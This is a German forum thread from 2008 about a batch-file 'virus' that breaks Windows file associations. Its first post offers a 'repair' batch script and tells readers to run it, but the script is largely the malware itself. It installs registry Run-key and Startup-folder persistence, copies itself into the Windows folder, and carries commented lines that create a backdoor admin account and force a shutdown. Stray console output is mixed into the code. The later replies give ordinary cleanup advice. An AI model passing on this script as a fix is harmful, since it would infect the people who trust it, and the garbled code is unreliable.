* Anmelden   * Registrieren
* FAQ     * Suche
Derzeit ist es 23 Mai 2012 06:26

Alle Zeiten sind UTC [ Sommerzeit ]




Ein neues Thema erstellen Auf das Thema antworten  [ 20 Beiträge ]  Gehe zu Seite 1, 2  Nächste
Autor Nachricht
 Betreff des Beitrags: Virus psYch0xX
BeitragVerfasst am: 26 Jan 2008 14:53 
Offline
Tastaturabnutzer
Benutzeravatar

Registriert: 21 Jun 2006 16:14
Beiträge: 2917
Wohnort: An einem munt'ren kleinen Bächlein...
Morgens!

Das oben genannte Virus ist zur Zeit wohl noch immer im Umlauf.
Glücklicherweise ist es eigentlich kein richtiges Virus und richtet keinen Schaden an, solange man nicht panisch irgendwelche Dinge tut wie die Festplatte zu formatieren oder ähnlich gute Ideen in die Tat umsetzt.
Das Virus sorgt dafür, dass die bekannten Dateitypen nicht mehr verknüpft sind und man somit keine .exe und ähnliche Files mehr öffnen kann.

Abhilfe ist relativ leicht, sofern man noch über einen zweiten Rechner verfügt und über einen Wechseldatenträger wie zB einen usb-stick, oder aber auch eine altmodische Diskette.
Man erzeugt auf dem "sauberen" Rechner mit dem Programm "Notepad" oder einem anderen simplen Texteditor eine neue Datei, die man unter dem Namen psycho.bat abspeichert.
Wichtig ist hier einfach nur, dass die Dateiendung .bat ist, ein sogenanntes Batchfile, oder auch Batchdatei um im deutschen Sprachgebrauch zu bleiben.

In diese Datei schreibt man dann folgendes:

Code:
@echo off
assoc .txt=txtfile
assoc .doc=Word.Document.8
assoc .rtf=Word.RTF.8
assoc .php=
assoc .htm=htmfile
assoc .html=htmlfile
assoc .xml=xmlfile
assoc .dot=Word.Template.8
assoc .wps=
assoc .avi=vlcavi
assoc .mpg=vlcmpg
assoc .mpeg=mpeg
assoc .wmv=
assoc .wma=
assoc .mp3=
assoc .wav=
assoc .aiff=
assoc .au=
assoc .mid=
assoc .midi=
assoc .exe=exefile
assoc .com=comfile
assoc .key=
assoc .rar=
assoc .zip=
assoc .vb=
assoc .vbs=
assoc .scr=
md %windir%\Command
copy %0 "%windir%\Command"
ren %windir%\Command\*.* Command.bat
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Winlogon /t REG_SZ /d %windir%\Command\Command.bat /f
copy %0 copy "C:\Dokumente und Einstellungen\Burns\Desktop\Batch_Systemfucker_Gen erator_v_1.3\BSG_1.3.exe" "%userprofile%\startm~1\Programme\Autostart"
ren %0 "%userprofile%\startm~1\Programme\Autostart\*.bat" Command.bat
Der Vorgang wurde erfolgreich ausgeführt.

Der Vorgang wurde erfolgreich ausgeführt.
rem net user "psYch0xX" "0wn3d" /add
rem net localgroup Administratoren "psYch0xX" /add
rem shutdown -s -f -t 10 -c "FucKeD by -psYch0xX-"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System" /v DisableTaskMgr /t REG_DWORD /d "0" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System" /v DisableRegistryTools /t REG_DWORD /d "0" /f


Jetzt kopiert man diese Batchdatei auf das Laufwerk C des infizierten Rechners und führt sie über das Startmenü -> Ausführen aus.
Danach sollte fast alles wieder so sein wie vorher.

Man löscht jetzt nur noch den Registry Eintrag
HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Winlogon /t REG_SZ /d %windir%\Command\Command.bat
, sowie die Ordner und den angelegten Admin und man hat sein System so wie vorher.

Dazu findet man mittels Start->Ausführen Regedit
den entsprechenden Schlüssel und löscht ihn und löscht dann den angelegten Adminuser über die Systemverwaltung.

Möge die Macht mit Euch sein!
derwisch

_________________
Die Dummheit der Menschen stirbt nie aus


Nach oben
   
   
 Betreff des Beitrags: Re: Virus psYch0xX
BeitragVerfasst am: 26 Jan 2008 15:19 
Offline
Hexe
Benutzeravatar

Registriert: 22 Jun 2006 16:49
Beiträge: 1404
Wohnort: das schönste Bundesland der Welt
Bist du sicher, dass man das alles da rein schreiben muss?

Ich hab nur das in die Datei geschrieben:
Code:
assoc .exe=exefile

_________________
Gruß, Toxina, signaturbefreit.


Nach oben
   
   
 Betreff des Beitrags: Re: Virus psYch0xX
BeitragVerfasst am: 26 Jan 2008 15:25 
:schock: :schock: :schock: Bitte was??? :schock: :schock: :schock:

Ich nixe aber auch gar nixe verstehn tu :zuck: ... :kratz: hm n´Virus also...kann man sich da nich einfach ne Spritze abholn und jut is???

:blumen: ...


Nach oben
  
   
 Betreff des Beitrags: Re: Virus psYch0xX
BeitragVerfasst am: 26 Jan 2008 15:55 
Offline
Tastaturabnutzer
Benutzeravatar

Registriert: 21 Jun 2006 16:14
Beiträge: 2917
Wohnort: An einem munt'ren kleinen Bächlein...
Toxina hat geschrieben:
Bist du sicher, dass man das alles da rein schreiben muss?

Ich hab nur das in die Datei geschrieben:
Code:
assoc .exe=exefile


Hängt davon ab, welche Files alle "abgeknipst" waren. Wenn er lediglich die exe entfernt hat, dann reicht das natürlich, aber wenn man alles reinschreibt, schadet das auch nichts.

Ich würde auf jeden Fall nachschauen, ob du auf dem PC einen User eingetragen hast, der da nicht hingehört und in der Registry würde ich auch nach dem genannten Schlüssel suchen.
Bevor du ihn löschst, mach lieber noch einen Systemwiederherstellungspunkt, dann kannst du zu diesem zurück, falls du einen falschen Schlüssel gelöscht hast ;-)

Virus kann man das Ding eigentlich ja auch nicht nennen, denn richtigen Schaden richtet er ja nicht an. Im Prinzip legt er einen Admin an, der eigentlich auch das ganze System zerschießen könnte, glücklicherweise tut er das aber nicht.
Insofern würde es sich vielleicht auch noch lohnen, von Microsoft die neuesten Sicherheitsupdates aus dem Netz zu ziehen.

Grüße
derwisch

_________________
Die Dummheit der Menschen stirbt nie aus


Nach oben
   
   
 Betreff des Beitrags: Re: Virus psYch0xX
BeitragVerfasst am: 26 Jan 2008 19:17 
Offline
Buchstabensparer
Benutzeravatar

Registriert: 21 Sep 2007 21:31
Beiträge: 20
Virus?!?

Sollte ich dieses Wort die nächsten Tage nochmals hören, kann es sein das ich total ausflippe.

Ihr wisst schon Lütte hatte Rota Virus.

und jetzt versuch mal in die das ganze Zeug reinzuschreiben.
Geht nicht oder wie Sigara sagt " Isch möchte nischt"

_________________
Mein Computer kann alles, wegen seiner 32 Bit!
Wenn ich 32 Bit intus habe, kann ich auch alles!


Nach oben
   
   
 Betreff des Beitrags: Re: Virus psYch0xX
BeitragVerfasst am: 26 Jan 2008 22:39 
Offline
Hexe
Benutzeravatar

Registriert: 22 Jun 2006 16:49
Beiträge: 1404
Wohnort: das schönste Bundesland der Welt
Den Code so wie er ist ganz und gar übernehmen? Da stehen ein paar seltsame Sachen mit drin, oder?

Also, nach deinem Bericht hab ich nachgesehen und den Admin auch gefunden. Den hab ich gelöscht. Eigene Dateien hatte er wohl keine, aber ich hatte die Option "die Dateien des Users alle mit löschen" gewählt, genau weiß ich das also nicht.

Nur das mit dem Schlüssel ... das hab ich nicht gefunden. :zuck:

_________________
Gruß, Toxina, signaturbefreit.


Nach oben
   
   
 Betreff des Beitrags: Re: Virus psYch0xX
BeitragVerfasst am: 26 Jan 2008 22:51 
Offline
Hexe
Benutzeravatar

Registriert: 22 Jun 2006 16:49
Beiträge: 1404
Wohnort: das schönste Bundesland der Welt
Souldiver hat geschrieben:
... und jetzt versuch mal in die das ganze Zeug reinzuschreiben...


:schock: :schock:

_________________
Gruß, Toxina, signaturbefreit.


Nach oben
   
   
 Betreff des Beitrags: Re: Virus psYch0xX
BeitragVerfasst am: 27 Jan 2008 11:53 
Offline
Tastaturabnutzer
Benutzeravatar

Registriert: 21 Jun 2006 16:14
Beiträge: 2917
Wohnort: An einem munt'ren kleinen Bächlein...
Toxina hat geschrieben:
Den Code so wie er ist ganz und gar übernehmen? Da stehen ein paar seltsame Sachen mit drin, oder?

Also, nach deinem Bericht hab ich nachgesehen und den Admin auch gefunden. Den hab ich gelöscht. Eigene Dateien hatte er wohl keine, aber ich hatte die Option "die Dateien des Users alle mit löschen" gewählt, genau weiß ich das also nicht.

Nur das mit dem Schlüssel ... das hab ich nicht gefunden. :zuck:


Wenn alle Dateitypen wieder vernünftig funktionieren, dann reicht das wohl aus.
In dem File oben wird davon ausgegangen, dass außer den Verknüpfungen für .exe auch einige andere vom Virus ersetzt, bzw gelöscht worden sind.
Wenn du nicht alles ausgeführt hast, dann hast du den Schlüssel in der Registry nicht angelegt, du kannst ihn also auch nicht finden und mithin nicht löschen.

Wenn sich weiterhin alles normal verhält, dann war es für dich ausreichend, die exe wieder ordnungsgemäß zuzuordnen und den Adminuser zu löschen.
Trotzdem würde ich mal ein hijackthis über den Rechner laufen lassen und auf der entsprechenden Seite das Logfile posten, um sicher zu gehen, dass sich nicht noch irgendwelche Prozesse auf dem Rechner tummeln, die dort nicht hingehören ;-)

Grüße
derwisch

_________________
Die Dummheit der Menschen stirbt nie aus


Nach oben
   
   
 Betreff des Beitrags: Re: Virus psYch0xX
BeitragVerfasst am: 27 Jan 2008 13:57 
Offline
Hexe
Benutzeravatar

Registriert: 22 Jun 2006 16:49
Beiträge: 1404
Wohnort: das schönste Bundesland der Welt
derwisch hat geschrieben:
...Trotzdem würde ich mal ein hijackthis über den Rechner laufen lassen und auf der entsprechenden Seite das Logfile posten...

ja ... nee ... is klar


:kratz:


Bild




... wie meinen, euer Merkwürden? Bild

_________________
Gruß, Toxina, signaturbefreit.


Nach oben
   
   
 Betreff des Beitrags: Re: Virus psYch0xX
BeitragVerfasst am: 27 Jan 2008 14:11 
Offline
Holla die Waldfee
Benutzeravatar

Registriert: 30 Nov 2006 16:00
Beiträge: 3254
Wohnort: In der Nähe einer ehemaligen Hauptstadt
http://www.hijackthis.de/de

Ja, manchmal ist es so einfach :mrgreen: Da gibt es ein exe-File zum Runterladen, das ausführen, ergibt eine Textdatei (log-File). Das bei der Internetadresse einkopieren, früher oder später schaut sich das wer an und gibt einen klugen Kommentar dazu ab.

Das Ganze ist sinnvoll, da manche eigentlich harmlosen Viren als Metaviren wirken: Sie machen Dein System anfälliger und richtig böse Dinge kommen rein. Ähnlich wie Aids die Immunabwehr schwächt und man viel leichter andere Krankheiten bekommt. Reine Sicherheitsmaßnahme, aber vernünftig.

Da ich polaroid bin, würde ich auch noch die Virensoftware aktualisieren, ebenso Spybot (oder Vergleichbares), auch bei Microsoft würde ich mal wegen Patches nachgucken.

Möge die Kraft mit Dir sein :mrgreen:

_________________
Bild Es gibt keinen Löffel.Bild
Ich bremse auch für Eier!
Zertifiziert für Tanner 7 nach DIN 9001.


Nach oben
   
   
 Betreff des Beitrags: Re: Virus psYch0xX
BeitragVerfasst am: 27 Jan 2008 16:52 
Offline
Hexe
Benutzeravatar

Registriert: 22 Jun 2006 16:49
Beiträge: 1404
Wohnort: das schönste Bundesland der Welt
Virenschutz hab ich ersetzt. :nick: norton raus, Kaspersky rein.

Spybot? Er hat AntiSpy, meinst du das?

Wie viele Prozesse laufen eigentlich normal so im Hintergrund? Bei Sönke sind das über 90. Kann das sein?

_________________
Gruß, Toxina, signaturbefreit.


Nach oben
   
   
 Betreff des Beitrags: Re: Virus psYch0xX
BeitragVerfasst am: 27 Jan 2008 17:48 
Offline
Holla die Waldfee
Benutzeravatar

Registriert: 30 Nov 2006 16:00
Beiträge: 3254
Wohnort: In der Nähe einer ehemaligen Hauptstadt
Toxina hat geschrieben:
Virenschutz hab ich ersetzt. :nick: norton raus, Kaspersky rein.

Spybot? Er hat AntiSpy, meinst du das?

Wie viele Prozesse laufen eigentlich normal so im Hintergrund? Bei Sönke sind das über 90. Kann das sein?


Ja :nick: , so was wie Spybot halt - den habe ich bei mir drauf. Bei mir laufen gerade (frisch gestartet, Outlook, IE mit vier Registerkarten) 43 Prozesse. Über 90 könnte also etwas viel sein. Vielleicht mal Programme deinstallieren, die man nicht mehr braucht? Frühjahrsputz vorziehen :mrgreen: ? Nach größeren Löschaktionen könnte man die Registry aufräumen, mit entsprechenden Tuningprogrammen (z.B. http://www.chip.de/downloads/Registry-S ... 05025.html )

Wenn der Rechner immer langsamer läuft, wirkt das schon mal wie ein großes Glas Rohrfrei auf den Abfluss :mrgreen:

_________________
Bild Es gibt keinen Löffel.Bild
Ich bremse auch für Eier!
Zertifiziert für Tanner 7 nach DIN 9001.


Nach oben
   
   
 Betreff des Beitrags: Re: Virus psYch0xX
BeitragVerfasst am: 27 Jan 2008 19:10 
Offline
Tastaturabnutzer
Benutzeravatar

Registriert: 21 Jun 2006 16:14
Beiträge: 2917
Wohnort: An einem munt'ren kleinen Bächlein...
naja, aber tee-nager haben meist diverse benachrichtiger laufen, da kann schon die Zahl der Prozesse sehr schnell anwachsen....
an der reinen Zahl kann man es wohl nicht festmachen..

greetz
derwisch

_________________
Die Dummheit der Menschen stirbt nie aus


Nach oben
   
   
 Betreff des Beitrags: Re: Virus psYch0xX
BeitragVerfasst am: 27 Jan 2008 19:24 
Offline
Holla die Waldfee
Benutzeravatar

Registriert: 30 Nov 2006 16:00
Beiträge: 3254
Wohnort: In der Nähe einer ehemaligen Hauptstadt
Seh ich auch so. War auch nur ein Vorschlag, falls das System langsamer als sonst laufen sollte.

Wünsche noch fröhliche Entseuchungsdurchführungsabschlussfeier :mrgreen: :huepf: :mrgreen:

_________________
Bild Es gibt keinen Löffel.Bild
Ich bremse auch für Eier!
Zertifiziert für Tanner 7 nach DIN 9001.


Nach oben
   
   
 Betreff des Beitrags: Re: Virus psYch0xX
BeitragVerfasst am: 27 Jan 2008 22:58 
Offline
Hexe
Benutzeravatar

Registriert: 22 Jun 2006 16:49
Beiträge: 1404
Wohnort: das schönste Bundesland der Welt
Zum Aufräumen hab ich ccleaner. Hab ich auch mal bei chip gefunden.
Da waren aber viele Seiten Fehler zu beheben, das sag ich euch.
:schock:

Das hijackdings hat ein paar unnötige aber harmlose Einträge gefunden und drei oder vier die vielleicht schädlich sein sollten. Das waren aber so Logitechteile die er angeblich für seine Supermaus braucht.

Immerhin muss man jetzt schon mal nicht mehr dreimal den PC starten, damit er läuft. :mrgreen:

_________________
Gruß, Toxina, signaturbefreit.


Nach oben
   
   
Beiträge der letzten Zeit anzeigen:  Sortiere nach  
Ein neues Thema erstellen Auf das Thema antworten  [ 20 Beiträge ]  Gehe zu Seite 1, 2  Nächste

Alle Zeiten sind UTC [ Sommerzeit ]


Wer ist online?

Mitglieder in diesem Forum: Keine Mitglieder und 1 Gast


Du darfst keine neuen Themen in diesem Forum erstellen
Du darfst keine Antworten zu Themen in diesem Forum erstellen
Du darfst deine Beiträge in diesem Forum nicht ändern
Du darfst deine Beiträge in diesem Forum nicht löschen
Du darfst keine Dateianhänge in diesem Forum erstellen

Suche nach:
Gehe zu:  
cron
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group

Deutsche Übersetzung durch phpBB.de